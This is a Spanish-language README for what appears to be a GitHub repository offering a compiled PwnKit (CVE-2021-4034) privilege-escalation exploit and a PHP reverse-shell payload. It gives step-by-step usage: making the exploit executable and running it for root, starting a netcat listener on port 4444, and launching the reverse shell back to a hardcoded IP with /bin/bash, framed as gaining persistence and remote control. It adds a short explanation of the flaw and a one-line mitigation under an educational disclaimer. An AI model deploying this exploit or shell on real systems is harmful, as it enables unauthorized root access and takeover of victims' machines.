
Repositorio de investigación de seguridad que contiene una Prueba de Concepto (PoC) para la vulnerabilidad CVE-2021-4034 (PwnKit) y utilidades de scripting para la demostración de escalada de privilegios y ejecución remota en entornos Linux.
⚠️ DISCLAIMER: Este repositorio ha sido creado únicamente con fines educativos y de investigación de seguridad. El autor no se hace responsable del mal uso de estas herramientas. Úsalo solo en entornos controlados o donde tengas permiso explícito.
Este repositorio contiene una Prueba de Concepto (PoC) compilada para la vulnerabilidad PwnKit (CVE-2021-4034), una falla crítica de escalada de privilegios local en el componente pkexec de Polkit.
Además, se incluye un script de Reverse Shell en PHP listo para ser desplegado tras la explotación o como vector de acceso inicial.
Lograr acceso root en sistemas Linux vulnerables y establecer persistencia o control remoto mediante una shell inversa.
PwnKit (ELF Binary)El exploit compilado para CVE-2021-4034.
pkexec para cargar una librería compartida maliciosa y ejecutar código como root.pkexec esté instalado en el objetivo.reverseShell.phpUn payload ligero para establecer una conexión inversa.
192.168.1.84444/bin/bashphp reverseShell.php) o inyectado en un servidor web vulnerable.PwnKit al sistema víctima.chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php si tu IP es diferente a la configurada por defecto.php reverseShell.php
Esta vulnerabilidad reside en cómo pkexec maneja los argumentos de la línea de comandos. Al pasar una lista de argumentos vacía, pkexec intenta acceder a argv[1] fuera de los límites, lo que permite a un atacante sobrescribir variables de entorno en la memoria, específicamente inyectando una variable GCONV_PATH maliciosa para secuestrar el flujo de ejecución.
Para protegerse contra este exploit:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️